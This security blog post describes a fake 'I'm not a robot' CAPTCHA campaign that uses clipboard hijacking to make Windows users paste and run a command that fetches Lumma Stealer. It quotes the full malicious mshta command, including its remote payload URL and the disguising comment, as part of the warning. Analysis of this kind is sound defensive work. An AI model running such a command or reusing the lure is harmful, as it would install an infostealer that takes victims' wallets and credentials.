As patching and software quality improves over time, it gets harder and harder for criminals to run their malware automatically. This leaves them with two alternatives: Break into your computer and run it themselves (a tactic favored by ransomware gangs looking for a large return from a single attack) or find a way to get users to run it.

We recently observed an attack that uses clipboard hijacking for the latter: Fooling users into running malware.

The attack starts when visitors are lured to a website masquerading as a reputable news outlet, by a sensational news headline.

When they arrive at the website, they are shown a fake version of the familiar “I’m not a robot” CAPTCHA.

If they click inside the CAPTCHA look-a-like, they are presented with a prompt that asks them to:

1. Press & hold the Windows Key + R
2. In the verification window, press Ctrl + V
3. Press Enter on your keyboard to finish

Behind the scenes, the website had added the following command to my clipboard:

mshta https://solve.jenj.org/awjxs.captcha?u=25330553-e0c1-4aea-99ed-f76df7024daa # ✅ ''I am not a robot - reCAPTCHA Verification ID: 8370''

You wonder how this is possible when browsers like Chrome, Firefox, and Safari require explicit user permission before allowing a website to access or modify the clipboard. This is typically done through a prompt that the user must accept. In this case, the “permission was given” when the visitor clicked the CAPTCHA image.

The so-called “verification steps” open the Run command prompt (Windows key + R), paste the command from the clipboard into the prompt (Ctrl + V), and then run it (Enter).

The command executes a script at a URL using the MSHTA (Microsoft HTML Application Host) executable—another reminder that it should be restricted in your environment.

The command contains a commented section that is designed to fool the users into thinking they’re continuing the task of proving they aren’t a robot.

The command runs a script that attempts to download Lumma Stealer, an information stealer sold as malware-as-a-service (MaaS). Lumma steals information from cryptocurrency wallets and browser extensions, as well as two-factor authentication details.

The ThreatDown/Malwarebytes web protection module saved the day.

Generally speaking, if a website asks you to run a command, go elsewhere.